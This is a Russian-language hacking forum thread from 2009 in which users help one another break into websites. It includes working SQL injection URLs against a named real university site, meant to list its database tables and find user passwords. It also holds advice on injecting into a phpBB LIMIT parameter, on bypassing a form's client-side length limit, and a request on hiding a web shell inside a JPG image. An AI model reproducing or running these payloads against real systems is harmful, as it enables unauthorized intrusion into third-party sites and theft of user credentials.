Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
15.01.2009, 11:57
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
http://www.inattack.ru/article/519.html
|
|
|
15.01.2009, 12:44
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Сообщение от diznt
народ как засунуть шелл в формат .jpg
ну как на видео делают, там они заливают картинку а там шелл что то типа такого
Все еще интересует!
Pashkela ACD несколько версий и я не знаю какую качать а вторая не хочет устанавливаться
|
|
|
|
15.01.2009, 12:52
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
|
|
|
|
15.01.2009, 23:27
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
Провел на форуме:
393715
Репутация:
90
|
|
помогите плиз найти таблицу с юзерами и пассами все облазил нигде не нашел((
http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables--
вывод всех таблиц
p.s. Сайт казанского государственного университета
|
|
|
|
16.01.2009, 00:07
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
pinky07, используй limit в запросах:
http://www.ksu.ru/vybor.php?newstype_id=-6+union+select+1,2,table_name,4,5,6,7,8,9,10,11+fr om+information_schema.tables+limit+30,20--
а то там скрипт только 20 таблиц выдает.
|
|
|
|
16.01.2009, 17:52
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
здрасти, собрался ставить булку так вот интересует вопрос как поставить фиксы на хаки(эксплоиты) или же надо самим в ручную капаца в php коде и вправлять?
|
|
|
|
16.01.2009, 17:57
|
|
Banned
Регистрация: 11.01.2009
Сообщений: 3
Провел на форуме:
35970
Репутация:
5
|
|
самому менять или ставить зафиксеные хаки
|
|
|
|
16.01.2009, 18:30
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка
Could not obtain post/user information.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8
SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3
Line : 449
File : viewtopic.php"
Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value=">>"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??
|
|
|
|
16.01.2009, 18:41
|
|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
Сообщение от Qam
Вобщем помогите мне в таком вопрсе,есть поле для ввода в форуме при вводе числа в которое ты переходишь на страницу число которой ты написал в этом поле,но если в это поле вписать капострофу,тоесть одиночную кавычку то MySQL выдаёт синтаксическую ошибку вообщем вот "Общая ошибка
Could not obtain post/user information.
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-3, 3' at line 8
SELECT u.username, u.user_id, u.user_level, u.user_posts, u.user_nic_color, u.user_allowsmile, u.user_allow_viewonline, u.user_session_time, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid, u.user_reputation, u.user_reputation_plus, u.user_warnings, u.user_level FROM phpbb_posts p, phpbb_users u, phpbb_posts_text pt WHERE p.topic_id = 1 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time DESC LIMIT -3, 3
Line : 449
File : viewtopic.php"
Возможно ли здесь провисти скуль инъекцию!?Вызывает сомнение то что отрываю исходный тест то вижу это <br/>Стр.<input type="text" name="start1" size="3" value="3"><input type="submit" value=">>"/></form></p> тоесть в это поле можно вести только 3 символа!!Стоит ли пробывать провести скуль инъекцию или нет??
1. "....тоесть в это поле можно вести только 3 символа!!" сохраняешь исходник страницы, правишь полный путь в форме к скрипту, и удаляешь параметр size="3". Как вариант отлавливаешь запрос naviscope+inetcrack правишь и отправляешь.
2. по иньекции не думаю что то то выйдет, как я понял иньекция в поле limit
|
|
|
|
16.01.2009, 18:48
|
|
Познающий
Регистрация: 16.01.2009
Сообщений: 40
Провел на форуме:
244040
Репутация:
15
|
|
Такую же ошибку(почти) могу вызвать в другом скрипте про limit там вот что:
t.topic_last_post_id DESC LIMIT -30, 30
Line : 273
File : viewforum.php
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
